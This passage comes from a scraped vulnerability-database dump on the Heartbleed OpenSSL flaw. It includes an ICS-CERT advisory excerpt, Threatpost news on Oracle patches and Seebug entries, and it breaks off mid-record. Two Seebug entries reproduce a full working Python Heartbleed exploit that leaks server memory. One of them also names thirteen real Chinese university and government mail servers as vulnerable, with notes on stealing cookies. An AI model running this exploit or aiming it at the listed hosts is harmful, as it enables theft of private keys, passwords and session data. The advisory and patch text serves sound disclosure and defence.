Ver. 
1.3.0.1, in order to provide adequate protection to ABB 650 series customers. ABB recommends that this maintenance release be applied, based on customers\u2019 risk assessment and exposure of the system.\n\nFor more information, please see the ABB Cyber Security Advisory on the ABB Cyber Security Alerts & Notifications web page at:\n\n<http://www.abb.com/cawp/abbzh254/2c9d1261d9fa1dcfc1257950002e4fbf.aspx>\n\nContact your local ABB customer support to obtain patch and installation support.\n\n### **\\--------- End Update A Part 2 of 2 ----------**\n\nIf user-defined accounts have been used, the passwords of those should be changed. It is also advised that cryptographic keys are regenerated by temporarily changing IP-address or IEC61850 name of the device.\n\nAdditional information is available from the ABB service organizations listed at: <http://www.abb.com/substationautomation>\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n\nICS-CERT also provides a section for control systems security recommended practices on the ICS-CERT web page at: http://ics-cert.us-cert.gov/content/recommended-practices. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. 
ICS-CERT reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nAdditional mitigation guidance and recommended practices are publicly available in the ICS\u2011CERT Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies, that is available for download from the ICS-CERT web site (http://ics-cert.us-cert.gov/).\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n\n * a. CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer, http://cwe.mitre.org/data/definitions/119.html, web site last accessed May 06, 2014.\n * b. NVD, http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160, web site last accessed May 06, 2014.\n * c. CVSS Calculator, http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:L/Au:N/C:P/I:N/A:N, web site last visited May 06, 2014.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. 
You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-14-126-01A>); we'd welcome your feedback.\n", "edition": 16, "modified": "2018-09-06T00:00:00", "published": "2014-07-08T00:00:00", "id": "ICSA-14-126-01A", "href": "https://www.us-cert.gov//ics/advisories/ICSA-14-126-01A", "title": "ABB Relion 650 Series OpenSSL Vulnerability (Update A)", "type": "ics", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:58", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "As the dominoes continue to fall around Heartbleed, Oracle is doing its best to keep users apprised of its ongoing efforts to patch software that may be vulnerable to the OpenSSL vulnerability.\n\nIn a document [updated early this morning](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) Oracle gave its customers five separate updates regarding:\n\n * Products that were never vulnerable to Heartbleed\n * Products still under investigation that may be vulnerable to Heartbleed\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have fixes\n * Products that are \u201clikely\u201d vulnerable to Heartbleed that have no current fixes\n * Products that do not use OpenSSL and\n * An update regarding Oracle Cloud\n\nMost of the updates given by Oracle refer to Heartbleed not by its buzzy nickname but by its official Common Vulnerabilities and Exposures number, [CVE-2014-0160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160>).\n\nMore than 100 products \u2013 managers, gateways, switches and systems, etc. 
\u2013 were ruled safe by the company, mostly because they don\u2019t run a version of OpenSSL that was ruled vulnerable to the CVE-2014-0160 instability.\n\nElsewhere developers at the company are reportedly still looking into whether or not 10 different products, notably those that use the company\u2019s Art Technology Group and Corente technology, are vulnerable to Heartbleed. Information for those products is still forthcoming.\n\nFourteen products, mostly those that rely on MySQL, Oracle\u2019s Big Data Appliance and its Mobile Security Suite have been patched so far. The company is posting as soon as each product is remedied and then linking to their respective support sections.\n\nConversely, 11 products, including some builds of Java ME and five iterations of its Communications suite, are branded as \u201clikely\u201d vulnerable but no fixes are yet available.\n\nLastly, the company claims it\u2019s still unsure of how Heartbleed affects products that rely on its Cloud computing technology but that it\u2019s \u201cinvestigating the implications of this issue across the Oracle stack.\u201d The bulk of cloud service products, including its Public Cloud, Managed Cloud Services and Cloud for Industry, are free of vulnerabilities but other services have been deemed \u201cunder investigation.\u201d\n\nOracle points out that the document should be considered as fluid and will continue to be updated as fixes and further mitigation instructions become available. Until then the patch and vulnerability information should be taken on an \u201cAS-IS\u201d basis.\n\nEnd users who deploy a variety of Oracle products on their networks have no doubt had their hands full with patches as of late. 
The Heartbleed update comes [just a few days after](<http://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494>) the company\u2019s regularly scheduled quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). That update resolved more than 100 security issues across Java SE, along with the company\u2019s Database and Fusion Middleware.\n", "modified": "2014-04-21T17:55:42", "published": "2014-04-21T13:55:42", "id": "THREATPOST:9012A325F248438FAC15C4FB3082A796", "href": "https://threatpost.com/oracle-gives-heartbleed-update-patches-14-products/105576/", "type": "threatpost", "title": "Oracle Gives Heartbleed Update, Patches 14 Products", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-10-06T22:59:00", "bulletinFamily": "info", "cvelist": ["CVE-2014-0160"], "description": "Software maker and database management company Oracle yesterday released its quarterly [Critical Patch Update](<http://www.oracle.com/technetwork/topics/security/cpuapr2014-1972952.html>). 
The release resolves more than 100 security vulnerabilities, many of which received high common vulnerability scoring system base scores and should be applied as soon as possible.\n\nProducts affected by the patch include but are not limited to Oracle Database, Fusion Middleware, Hyperion, Supply Chain Product Suite, iLearning, PeopleSoft Enterprise, Siebel CRM, Java SE, and Sun Microsystems Products Suite, including Oracle Linux and Virtualization, and Oracle MySQL.\n\nLast week, Oracle released a [list of products](<http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html>) affected by the [Heartbleed OpenSSL vulnerability](<http://threatpost.com/certificate-revocation-slow-for-heartbleed-servers/105489>), as well as their current status with respect to vulnerable versions of the encryption library.\n\nAmong the patches that should be prioritized are two bugs in Oracle\u2019s database products. The more severe of these two issues could lead to a full compromise of impacted Windows systems, though exploitation would require that an attacker authenticate him or herself. Other platforms like Linux and Solaris are less affected because the database does not extend into the underlying operating system there.\n\nThe update also closes off 20 Fusion middleware vulnerabilities, the most critical of which is remotely exploitable without authentication and could lead to a wide compromise of the WebLogic Server.\n\nAlso included in its April release are 37 Java vulnerabilities. Four of those received the highest possible CVSS ratings of 10.0. Oracle urges all users \u2013 home users in particular \u2013 to apply these patches immediately.\n\nThe patch update also fixes five vulnerabilities affecting Oracle Linux and Virtualization products. 
The most severe of these vulnerabilities could affect certain versions of Oracle Global Secure Desktop.\n\n\u201cDue to the relative severity of a number of the vulnerabilities fixed in this Critical Patch Update, Oracle strongly recommends that customers apply this Critical Patch Update as soon as possible,\u201d wrote Oracle security assurance manager, Eric Maurice.\n\nEarlier this month, [researchers from Security Explorations disclosed more than two dozen outstanding issues with the company\u2019s Java Cloud Service platform](<http://threatpost.com/researchers-divulge-30-oracle-java-cloud-service-bugs/105190>). There is no mention of that line of products in the update, so it appears that the company did not resolve those bugs. At the beginning of March, researchers at the London-based computer security firm Portcullis claimed to uncover [four bugs in Oracle\u2019s Demantra Value Chain Planning suite of software](<http://threatpost.com/four-vulnerabilities-found-in-oracle-demantra/104574>). 
The update makes no mention of these vulnerabilities either.\n", "modified": "2014-04-21T14:36:06", "published": "2014-04-16T12:32:06", "id": "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "href": "https://threatpost.com/oracle-fixes-104-security-vulnerabilities-in-quarterly-patch-update/105494/", "type": "threatpost", "title": "April 2014 Oracle Critical Patch Update", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-11-19T17:27:54", "description": "CVE ID:CVE-2014-0160\r\n\r\nSplunk\u662f\u673a\u5668\u6570\u636e\u7684\u5f15\u64ce\u3002\u4f7f\u7528Splunk\u53ef\u6536\u96c6\u3001\u7d22\u5f15\u548c\u5229\u7528\u6240\u6709\u5e94\u7528\u7a0b\u5e8f\u3001\u670d\u52a1\u5668\u548c\u8bbe\u5907\uff08\u7269\u7406\u3001\u865a\u62df\u548c\u4e91\u4e2d\uff09\u751f\u6210\u7684\u5feb\u901f\u79fb\u52a8\u578b\u8ba1\u7b97\u673a\u6570\u636e\u3002\r\n\r\nSplunk\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\n0\nSplunk 6.x\nSplunk 6.0.3\u7248\u672c\u5df2\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.splunk.com", "published": "2014-04-16T00:00:00", "title": "Splunk OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62198", "id": "SSV:62198", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T13:55:16", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Memory Disclosure (Multiple SSL/TLS versions)", "type": "seebug", "bulletinFamily": 
"exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-86038", "id": "SSV:86038", "sourceData": "\n # Exploit Title: [OpenSSL TLS Heartbeat Extension - Memory Disclosure - Multiple SSL/TLS versions]\r\n# Date: [2014-04-09]\r\n# Exploit Author: [Csaba Fitzl]\r\n# Vendor Homepage: [http://www.openssl.org/]\r\n# Software Link: [http://www.openssl.org/source/openssl-1.0.1f.tar.gz]\r\n# Version: [1.0.1f]\r\n# Tested on: [N/A]\r\n# CVE : [2014-0160]\r\n\r\n\r\n#!/usr/bin/env python\r\n\r\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\r\n# The author disclaims copyright to this source code.\r\n# Modified by Csaba Fitzl for multiple SSL / TLS version support\r\n\r\nimport sys\r\nimport struct\r\nimport socket\r\nimport time\r\nimport select\r\nimport re\r\nfrom optparse import OptionParser\r\n\r\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\r\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\r\n\r\ndef h2bin(x):\r\n\treturn x.replace(' ', '').replace('\\n', '').decode('hex')\r\n\r\nversion = []\r\nversion.append(['SSL 3.0','03 00'])\r\nversion.append(['TLS 1.0','03 01'])\r\nversion.append(['TLS 1.1','03 02'])\r\nversion.append(['TLS 1.2','03 03'])\r\n\r\ndef create_hello(version):\r\n\thello = h2bin('16 ' + version + ' 00 dc 01 00 00 d8 ' + version + ''' 53\r\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\r\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\r\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\r\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\r\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\r\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\r\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\r\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\r\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\r\n03 00 01 02 00 0a 00 34 00 
32 00 0e 00 0d 00 19\r\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\r\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\r\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\r\n00 0f 00 01 01\r\n''')\r\n\treturn hello\r\n\r\ndef create_hb(version):\r\n\thb = h2bin('18 ' + version + ' 00 03 01 40 00')\r\n\treturn hb\r\n\r\ndef hexdump(s):\r\n\tfor b in xrange(0, len(s), 16):\r\n\t\tlin = [c for c in s[b : b + 16]]\r\n\t\thxdat = ' '.join('%02X' % ord(c) for c in lin)\r\n\t\tpdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)\r\n\t\tprint ' %04x: %-48s %s' % (b, hxdat, pdat)\r\n\tprint\r\n\r\ndef recvall(s, length, timeout=5):\r\n\tendtime = time.time() + timeout\r\n\trdata = ''\r\n\tremain = length\r\n\twhile remain > 0:\r\n\t\trtime = endtime - time.time()\r\n\t\tif rtime < 0:\r\n\t\t\treturn None\r\n\t\tr, w, e = select.select([s], [], [], 5)\r\n\t\tif s in r:\r\n\t\t\tdata = s.recv(remain)\r\n\t\t\t# EOF?\r\n\t\t\tif not data:\r\n\t\t\t\treturn None\r\n\t\t\trdata += data\r\n\t\t\tremain -= len(data)\r\n\treturn rdata\r\n\r\n\r\ndef recvmsg(s):\r\n\thdr = recvall(s, 5)\r\n\tif hdr is None:\r\n\t\tprint 'Unexpected EOF receiving record header - server closed connection'\r\n\t\treturn None, None, None\r\n\ttyp, ver, ln = struct.unpack('>BHH', hdr)\r\n\tpay = recvall(s, ln, 10)\r\n\tif pay is None:\r\n\t\tprint 'Unexpected EOF receiving record payload - server closed connection'\r\n\t\treturn None, None, None\r\n\tprint ' ... 
received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\r\n\treturn typ, ver, pay\r\n\r\ndef hit_hb(s,hb):\r\n\ts.send(hb)\r\n\twhile True:\r\n\t\ttyp, ver, pay = recvmsg(s)\r\n\t\tif typ is None:\r\n\t\t\tprint 'No heartbeat response received, server likely not vulnerable'\r\n\t\t\treturn False\r\n\r\n\t\tif typ == 24:\r\n\t\t\tprint 'Received heartbeat response:'\r\n\t\t\thexdump(pay)\r\n\t\t\tif len(pay) > 3:\r\n\t\t\t\tprint 'WARNING: server returned more data than it should - server is vulnerable!'\r\n\t\t\telse:\r\n\t\t\t\tprint 'Server processed malformed heartbeat, but did not return any extra data.'\r\n\t\t\treturn True\r\n\r\n\t\tif typ == 21:\r\n\t\t\tprint 'Received alert:'\r\n\t\t\thexdump(pay)\r\n\t\t\tprint 'Server returned error, likely not vulnerable'\r\n\t\t\treturn False\r\n\r\ndef main():\r\n\topts, args = options.parse_args()\r\n\tif len(args) < 1:\r\n\t\toptions.print_help()\r\n\t\treturn\r\n\tfor i in range(len(version)):\r\n\t\tprint 'Trying ' + version[i][0] + '...'\r\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\tprint 'Connecting...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.connect((args[0], opts.port))\r\n\t\tprint 'Sending Client Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hello(version[i][1]))\r\n\t\tprint 'Waiting for Server Hello...'\r\n\t\tsys.stdout.flush()\r\n\t\twhile True:\r\n\t\t\ttyp, ver, pay = recvmsg(s)\r\n\t\t\tif typ == None:\r\n\t\t\t\tprint 'Server closed connection without sending Server Hello.'\r\n\t\t\t\treturn\r\n\t\t\t# Look for server hello done message.\r\n\t\t\tif typ == 22 and ord(pay[0]) == 0x0E:\r\n\t\t\t\tbreak\r\n\r\n\t\tprint 'Sending heartbeat request...'\r\n\t\tsys.stdout.flush()\r\n\t\ts.send(create_hb(version[i][1]))\r\n\t\tif hit_hb(s,create_hb(version[i][1])):\r\n\t\t\t#Stop if vulnerable\r\n\t\t\tbreak\r\n\r\nif __name__ == '__main__':\r\n\tmain()\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": 
"https://www.seebug.org/vuldb/ssvid-86038"}, {"lastseen": "2017-11-19T17:27:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nSophos Antivirus\u662f\u4e00\u6b3e\u9632\u75c5\u6bd2\u5e94\u7528\u7a0b\u5e8f\u3002\r\n\r\nSophos Antivirus for vShield\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nSophos Antivirus for vShield 1.0\r\nSophos Antivirus for vShield 1.1\n\u76ee\u524d\u6ca1\u6709\u8be6\u7ec6\u89e3\u51b3\u65b9\u6848\uff1a\r\nhttp://www.sophos.com", "published": "2014-04-16T00:00:00", "title": "Sophos Antivirus for vShield OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62197", "id": "SSV:62197", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:44", "description": "CVE 
ID:CVE-2014-0160\r\n\r\nPostgreSQL\u662f\u4e00\u6b3e\u5bf9\u8c61\u5173\u7cfb\u578b\u6570\u636e\u5e93\u7ba1\u7406\u7cfb\u7edf\uff0c\u652f\u6301\u6269\u5c55\u7684SQL\u6807\u51c6\u5b50\u96c6\u3002\r\n\r\nPostgreSQL\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201c\u5fc3\u8df3\u201d\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u8fde\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nPostgreSQL 8.x\r\nPostgreSQL 9.x\nPostgreSQL 9.3.4-3, 9.2.8-3, 9.1.13-3, 9.0.17-3\u548c8.4.21-3\u7248\u672c\u5df2\u7ecf\u4fee\u590d\u8be5\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.enterprisedb.com", "published": "2014-04-21T00:00:00", "title": "PostgreSQL OpenSSL TLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62241", "id": "SSV:62241", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:26", "description": "CVE ID:CVE-2014-0160\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server Security\u4ea7\u54c1\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\r\n\r\nF-Secure E-mail/Server Security/F-Secure Server 
Security\u6240\u7ed1\u5b9a\u7684OpenSSL\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0cOpenSSL\u5904\u7406TLS\u201d\u5fc3\u8df3\u201c\u6269\u5c55\u5b58\u5728\u4e00\u4e2a\u8fb9\u754c\u9519\u8bef\uff0c\u5141\u8bb8\u653b\u51fb\u8005\u5229\u7528\u6f0f\u6d1e\u83b7\u53d664k\u5927\u5c0f\u7684\u5df2\u94fe\u63a5\u5ba2\u6237\u7aef\u6216\u670d\u52a1\u5668\u7684\u5185\u5b58\u5185\u5bb9\u3002\u5185\u5b58\u4fe1\u606f\u53ef\u5305\u62ec\u79c1\u94a5\uff0c\u7528\u6237\u540d\u5bc6\u7801\u7b49\u3002\n0\nF-Secure E-mail and Server Security 10.x\r\nF-Secure E-mail and Server Security 11.x\r\nF-Secure Server Security 10.x\r\nF-Secure Server Security 11.x\n\u76ee\u524d\u5382\u5546\u5df2\u7ecf\u53d1\u5e03\u4e86\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8bf7\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.f-secure.com/en/web/labs_global/fsc-2014-1", "published": "2014-04-16T00:00:00", "title": "F-Secure E-mail/Server Security OpenSSL TLS/DTLS\u5fc3\u8df3\u4fe1\u606f\u6cc4\u6f0f\u6f0f\u6d1e", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-16T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-62185", "id": "SSV:62185", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:27:32", "description": "### \u7b80\u8981\u63cf\u8ff0\uff1a\n\n\u6253\u5305\u4e86\u4e00\u5806\u7f51\u7ad9,\u5185\u5b58\u91cc\u6709cookies :D\n\n### \u8be6\u7ec6\u8bf4\u660e\uff1a\n\neYouMail 5 inurl:edu\n\u641c\u7d20\u51fa\u6765\u5c31\u80fd\u6709\u6f0f\u6d1e\u7684\u673a\u738790%\u5de6\u53f3\n\u524d\u4e09\u9875\u6210\u529f\u7684\u7ed3\u679c\n\n\n```\nmail.jn.gov.cn\nmail.hpu.edu.cn\nmail.just.edu.cn\nmail.hnust.edu.cn\nmail.tjut.edu.cn\nmail.shupl.edu.cn\nmail.haust.edu.cn\nmail.dufe.edu.cn\nmail.jliae.edu.cn\nmail.hist.edu.cn\ndn1s.cmc.edu.cn\nmail.hbpu.edu.cn\nmail.dzu.edu.cn\n```\n\n\nPOC\u9001\u4e0a \u81ea\u5df1\u6d4b\u8bd5\n\n\n```\n#!/usr/bin/python\n# Quick 
and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n #print pay\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for 
server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\nif __name__ == '__main__':\n main()\n```\n\n \n\n### \u6f0f\u6d1e\u8bc1\u660e\uff1a\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg\" alt=\"1.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221830d27d113ac938c15b29234c5ed509ecfe.jpg)\n\n\n\n\n[<img src=\"https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg\" alt=\"2.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/08221838a3a7f55603e290339efcc8cf3500f481.jpg)\n\n\n\u5185\u5b58\u91cc\u6709cookies \n\n[<img src=\"https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg\" alt=\"3.jpg\" width=\"600\" onerror=\"javascript:errimg(this);\">](https://images.seebug.org/upload/201404/082221182d9aef33b54dee5567695f6c4215b488.jpg)", "published": "2014-04-11T00:00:00", "title": "\u4ebf\u90ae\u67d0\u7248\u672cOPENSSL heartbleed \u901a\u6740", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0160"], "modified": "2014-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-95013", "id": "SSV:95013", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T17:26:53", "description": "CVE ID:CVE-2014-0160\r\n\r\nMcAfee Endpoint Intelligence 